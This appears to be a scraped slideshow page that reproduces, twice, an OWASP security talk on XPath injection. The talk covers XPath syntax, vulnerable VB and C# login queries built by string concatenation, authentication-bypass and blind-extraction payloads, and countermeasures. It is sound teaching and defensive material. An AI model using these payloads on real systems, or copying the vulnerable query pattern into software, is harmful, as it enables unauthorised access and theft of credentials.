logging in or signing up AppScan Presentation syedasafia Download Post to : URL : Related Presentations : Share Add to Flag Embed Email Send to Blogs and Networks Add to Channel Uploaded from authorPOINT lite Insert YouTube videos in PowerPont slides with aS Desktop Copy embed code: (To copy code, click on the text box) Embed: URL: Thumbnail: WordPress Embed Customize Embed The presentation is successfully added In Your Favorites. Views: 791 Category: Entertainment License: All Rights Reserved Like it (0) Dislike it (0) Added: August 08, 2008 This Presentation is Public Favorites: 0 Presentation Description AppScna Presentation Comments Posting comment... Premium member Presentation Transcript Slide 1: OWASP – XPath Injection overview Roberto Suggi Liverani Security Consultant Security-Assessment.com 21 February 2008 Slide 2: Who am I? Roberto Suggi Liverani Security Consultant, CISSP Security-Assessment.com 4 + years in Information Security, focusing on web application and network security OWASP New Zealand leader 2 Slide 3: Agenda Understanding Xpath (the theory part… ) What is XPath? XPath Syntax XPath Predicates XPath Location Path XPath Functions XPath Injection (the funny part… ) XPath Injection (techniques and examples) Blind XPath Injection (techniques and examples) XPath Injection countermeasures 3 Slide 4: What is XPath? XPath is a language solely used for selecting nodes from an XML document XPath formats XML data as tree-structured values There are some similarities between SQL and XPath XPath v.1.0 is a W3C standard and it is still the most used - XPath v.2.0 recently released. Many languages support XPath such as Java, JavaScript, .NET framework, PHP, Python, Perl and Ruby. 4 Slide 5: XPath Nodes: An XML document from XPath perspective (1/2) 5 Slide 6: An XML document from Xpath perspective (2/2) Relationships of Nodes: <?xml version="1.0" encoding="ISO-8859-1"?> <users> <user> <username =“1”>root</username> <password>OAhhgg</password> <account>root</account> </user> </users> Relationships: <user> is the parent node of <username> , <password> , <account> <username> , <password> , <account> are children nodes of the element <user> <username> , <password> , <account> are all siblings (they have the same parent) <users> and <user> are ancestors of <username>, <password>, <account> <username>, <password>, <account> are descendants of the element <users> 6 Slide 7: XPath Syntax (1/3) XPath uses path expressions to select nodes or node-sets in an XML document. Path expressions is very similar to URI syntax and file path syntax. Selecting Nodes: 7 Slide 8: XPath Syntax (2/3) Example: 8 Slide 9: XPath Syntax – other query examples (3/3) 9 Slide 10: XPath Predicates Predicates are used to find a specific node or a node that contains a specific value. Predicates can use XPath operators. Predicates are always embedded in square brackets. 10 XPath operators are shown in red. Slide 11: XPath Location Path (1/2) Location path is a special case of XPath Expression. Two types: absolute and relative location path Absolute Location Path starts with a (forward) slash Relative Location Path starts without a slash In both cases the location path consists of one or more steps, each separated by a slash. Example: Absolute Location Path: /users/user/username A step is composed by: an axis (defines the tree-relationship between the selected nodes and the current node) a node-test (identifies a node within an axis) zero or more predicates (to further refine the selected node-set) The syntax for a location step is: axisname::nodetest[predicate] There are several axisname that can be used. Most common are: ancestor, attribute, descendant, child 11 Slide 12: XPath Location Path – Examples (2/2) 12 XPath Wilcards are bolded in red. XPath Axisname are underlined. Slide 13: XPath Functions Functions specified for XSLT and Xquery can also be used for XPath. Functions are related to strings, boolean, date/time, error and trace, numeric, node, sequence, qname, anyURI, context. Short list of the most important functions: 13 Slide 14: XPath Injection (1/2) Scenario: authentication system which performs XPath query This is a standard authentication query. 14 VB: Dim FindUserXPath as String FindUserXPath = "//Users/user[username/text()='" & Request("Username") & "' And password/text()='" & Request("Password") & "']" C#: String FindUserXPath; FindUserXPath = "//Users/user[username/text()='" + Request("Username") + "' And password/text()='" + Request("Password") + "']"; Username = user Password = password XPath query becomes: //users/user[username/text()=‘user’ and password/text()=‘password’] Slide 15: XPath Injection (2/2) In this case, injection is possible in the Username variable. The same attack logic of SQL injection can be applied for XPath. In this case, only the first part of the XPath needs to be true. The password part becomes irrelevant, and the UserName part will match ALL users because of the "1=1" condition. This injection will allow the attacker to bypass the authentication system. Note that the big difference between XML files and SQL databases is the lack of access control. XPath does not have any restrictions when querying the XML file. Therefore it is possible to retrieve data from the entire document. 15 Username = user’ or ‘1’ = ‘1 Password = password XPath query becomes: //users/user[username/text()=‘user’ or ‘1’ = ‘1’ and password/text()=‘password’] Slide 16: Blind XPath Injection (1/3) Blind XPath Injection – Amit Klein – white paper XPath disallows commenting out the rest of expression. The attacker needs to use ‘OR’ to void all expressions. Original Xpath Request: 1) Extracting XML file structure: (confirming if “username” node exists) 16 Username = user Password = password XPath query becomes: //users/user[username/text()=‘user’ and password/text()=‘password’] Username = jjj' or name(//users/user/username[1]) = 'username' or 'a'='b Password = password XPath query becomes: //users/user[username/text()=‘jjj' or name(//users/user/username[1]) = 'username' or 'a'='b' and password/text()=‘password’] Slide 17: Blind XPath Injection (2/3) 2) Considering we have valid credentials for one user, we can then use these TRUE conditions to get other user credentials in the database. In this scenario, this query will return TRUE if also the first character of the second user password element is “a”. This blind Xpath injection can also make use of the functions “contains” and “string-length” and all relative functions. In this case, AND must be used so that all conditions must be true. 17 count(//user/child::node()) Username = root' and substring((//user[position()=2]/child::node()[position()=1]),1,1)="a" and '1' = '1 Password = OAhhgg XPath query becomes: //users/user[username/text()=‘root’ and substring((//user[position()=2]/child::node()[position()=1]),1,1)="a" and '1' = '1' and password/text()=‘OAhhgg’] Slide 18: Blind XPath Injection – (3/3) Other XML crawling techniques that can be used: Return number of nodes in the XML file Return True if the length of the first username element is equal to 4 digits Return True if the first username element contains the string “r” 18 string-length(//username[position()=1]/child::node()[position()=1])=4 count(//user/child::node()) contains(//username[position()=1]/child::node()[position()=1],”r”) Slide 19: XPath Injection Countermeasures Input Validation Always filter input and escape output Parameterisation It is possible to parametirise expressions that are passed to the XPath parser for dynamic execution at run time. The query can be parameterised by creating an external file and using XQuery to query the file. Precompiled XPath Use precompiled XPath. If you are using .NET, consider Dynamic Context of Daniel Cazzulino. 19 XPathNodeIterator custData = XPathCache.Select( "//customer[@name=$name and @password=$password]", customersDocument, new XPathVariable("name", txtName.Text), new XPathVariable("password", txtPassword.Text)); Slide 20: Questions/Conclusion Thank you! roberto.suggi@security-assessment.com Presentation can be downloaded here: http://malerisch.net/xpath_injection/xpath_injection.ppt 20 Slide 21: References – Misc. XPath W3C http://www.w3.org/TR/xpath Software – XPath Builder http://www.bubasoft.net Blind XPath injection – Amit Klein http://www.modsecurity.org/archive/amit/blind-xpath-injection.pdf Avoid the dangers of XPath Injection http://www.ibm.com/developerworks/xml/library/x-xpathinjection.html 21 Slide 22: References Blind XPath Injection http://www.owasp.org/index.php/Blind_XPath_Injection XPath Tutorial http://www.w3schools.com/xpath/default.asp OWASP – Test XPath Injection http://www.owasp.org/index.php/XPath_Injection_Testing_AoC Dynamic Context http://weblogs.asp.net/cazzu/archive/2003/10/07/30888.aspx 22 Slide 23: References http://www.tkachenko.com/blog/archives/000385.html Signs on the sand – Mitigating XPath injection 23 You do not have the permission to view this presentation. In order to view it, please contact the author of the presentation.
AppScan Presentation syedasafia Download Post to : URL : Related Presentations : Share Add to Flag Embed Email Send to Blogs and Networks Add to Channel Uploaded from authorPOINT lite Insert YouTube videos in PowerPont slides with aS Desktop Copy embed code: (To copy code, click on the text box) Embed: URL: Thumbnail: WordPress Embed Customize Embed The presentation is successfully added In Your Favorites. Views: 791 Category: Entertainment License: All Rights Reserved Like it (0) Dislike it (0) Added: August 08, 2008 This Presentation is Public Favorites: 0 Presentation Description AppScna Presentation Comments Posting comment... Premium member Presentation Transcript Slide 1: OWASP – XPath Injection overview Roberto Suggi Liverani Security Consultant Security-Assessment.com 21 February 2008 Slide 2: Who am I? Roberto Suggi Liverani Security Consultant, CISSP Security-Assessment.com 4 + years in Information Security, focusing on web application and network security OWASP New Zealand leader 2 Slide 3: Agenda Understanding Xpath (the theory part… ) What is XPath? XPath Syntax XPath Predicates XPath Location Path XPath Functions XPath Injection (the funny part… ) XPath Injection (techniques and examples) Blind XPath Injection (techniques and examples) XPath Injection countermeasures 3 Slide 4: What is XPath? XPath is a language solely used for selecting nodes from an XML document XPath formats XML data as tree-structured values There are some similarities between SQL and XPath XPath v.1.0 is a W3C standard and it is still the most used - XPath v.2.0 recently released. Many languages support XPath such as Java, JavaScript, .NET framework, PHP, Python, Perl and Ruby. 4 Slide 5: XPath Nodes: An XML document from XPath perspective (1/2) 5 Slide 6: An XML document from Xpath perspective (2/2) Relationships of Nodes: <?xml version="1.0" encoding="ISO-8859-1"?> <users> <user> <username =“1”>root</username> <password>OAhhgg</password> <account>root</account> </user> </users> Relationships: <user> is the parent node of <username> , <password> , <account> <username> , <password> , <account> are children nodes of the element <user> <username> , <password> , <account> are all siblings (they have the same parent) <users> and <user> are ancestors of <username>, <password>, <account> <username>, <password>, <account> are descendants of the element <users> 6 Slide 7: XPath Syntax (1/3) XPath uses path expressions to select nodes or node-sets in an XML document. Path expressions is very similar to URI syntax and file path syntax. Selecting Nodes: 7 Slide 8: XPath Syntax (2/3) Example: 8 Slide 9: XPath Syntax – other query examples (3/3) 9 Slide 10: XPath Predicates Predicates are used to find a specific node or a node that contains a specific value. Predicates can use XPath operators. Predicates are always embedded in square brackets. 10 XPath operators are shown in red. Slide 11: XPath Location Path (1/2) Location path is a special case of XPath Expression. Two types: absolute and relative location path Absolute Location Path starts with a (forward) slash Relative Location Path starts without a slash In both cases the location path consists of one or more steps, each separated by a slash. Example: Absolute Location Path: /users/user/username A step is composed by: an axis (defines the tree-relationship between the selected nodes and the current node) a node-test (identifies a node within an axis) zero or more predicates (to further refine the selected node-set) The syntax for a location step is: axisname::nodetest[predicate] There are several axisname that can be used. Most common are: ancestor, attribute, descendant, child 11 Slide 12: XPath Location Path – Examples (2/2) 12 XPath Wilcards are bolded in red. XPath Axisname are underlined. Slide 13: XPath Functions Functions specified for XSLT and Xquery can also be used for XPath. Functions are related to strings, boolean, date/time, error and trace, numeric, node, sequence, qname, anyURI, context. Short list of the most important functions: 13 Slide 14: XPath Injection (1/2) Scenario: authentication system which performs XPath query This is a standard authentication query. 14 VB: Dim FindUserXPath as String FindUserXPath = "//Users/user[username/text()='" & Request("Username") & "' And password/text()='" & Request("Password") & "']" C#: String FindUserXPath; FindUserXPath = "//Users/user[username/text()='" + Request("Username") + "' And password/text()='" + Request("Password") + "']"; Username = user Password = password XPath query becomes: //users/user[username/text()=‘user’ and password/text()=‘password’] Slide 15: XPath Injection (2/2) In this case, injection is possible in the Username variable. The same attack logic of SQL injection can be applied for XPath. In this case, only the first part of the XPath needs to be true. The password part becomes irrelevant, and the UserName part will match ALL users because of the "1=1" condition. This injection will allow the attacker to bypass the authentication system. Note that the big difference between XML files and SQL databases is the lack of access control. XPath does not have any restrictions when querying the XML file. Therefore it is possible to retrieve data from the entire document. 15 Username = user’ or ‘1’ = ‘1 Password = password XPath query becomes: //users/user[username/text()=‘user’ or ‘1’ = ‘1’ and password/text()=‘password’] Slide 16: Blind XPath Injection (1/3) Blind XPath Injection – Amit Klein – white paper XPath disallows commenting out the rest of expression. The attacker needs to use ‘OR’ to void all expressions. Original Xpath Request: 1) Extracting XML file structure: (confirming if “username” node exists) 16 Username = user Password = password XPath query becomes: //users/user[username/text()=‘user’ and password/text()=‘password’] Username = jjj' or name(//users/user/username[1]) = 'username' or 'a'='b Password = password XPath query becomes: //users/user[username/text()=‘jjj' or name(//users/user/username[1]) = 'username' or 'a'='b' and password/text()=‘password’] Slide 17: Blind XPath Injection (2/3) 2) Considering we have valid credentials for one user, we can then use these TRUE conditions to get other user credentials in the database. In this scenario, this query will return TRUE if also the first character of the second user password element is “a”. This blind Xpath injection can also make use of the functions “contains” and “string-length” and all relative functions. In this case, AND must be used so that all conditions must be true. 17 count(//user/child::node()) Username = root' and substring((//user[position()=2]/child::node()[position()=1]),1,1)="a" and '1' = '1 Password = OAhhgg XPath query becomes: //users/user[username/text()=‘root’ and substring((//user[position()=2]/child::node()[position()=1]),1,1)="a" and '1' = '1' and password/text()=‘OAhhgg’] Slide 18: Blind XPath Injection – (3/3) Other XML crawling techniques that can be used: Return number of nodes in the XML file Return True if the length of the first username element is equal to 4 digits Return True if the first username element contains the string “r” 18 string-length(//username[position()=1]/child::node()[position()=1])=4 count(//user/child::node()) contains(//username[position()=1]/child::node()[position()=1],”r”) Slide 19: XPath Injection Countermeasures Input Validation Always filter input and escape output Parameterisation It is possible to parametirise expressions that are passed to the XPath parser for dynamic execution at run time. The query can be parameterised by creating an external file and using XQuery to query the file. Precompiled XPath Use precompiled XPath. If you are using .NET, consider Dynamic Context of Daniel Cazzulino. 19 XPathNodeIterator custData = XPathCache.Select( "//customer[@name=$name and @password=$password]", customersDocument, new XPathVariable("name", txtName.Text), new XPathVariable("password", txtPassword.Text)); Slide 20: Questions/Conclusion Thank you! roberto.suggi@security-assessment.com Presentation can be downloaded here: http://malerisch.net/xpath_injection/xpath_injection.ppt 20 Slide 21: References – Misc. XPath W3C http://www.w3.org/TR/xpath Software – XPath Builder http://www.bubasoft.net Blind XPath injection – Amit Klein http://www.modsecurity.org/archive/amit/blind-xpath-injection.pdf Avoid the dangers of XPath Injection http://www.ibm.com/developerworks/xml/library/x-xpathinjection.html 21 Slide 22: References Blind XPath Injection http://www.owasp.org/index.php/Blind_XPath_Injection XPath Tutorial http://www.w3schools.com/xpath/default.asp OWASP – Test XPath Injection http://www.owasp.org/index.php/XPath_Injection_Testing_AoC Dynamic Context http://weblogs.asp.net/cazzu/archive/2003/10/07/30888.aspx 22 Slide 23: References http://www.tkachenko.com/blog/archives/000385.html Signs on the sand – Mitigating XPath injection 23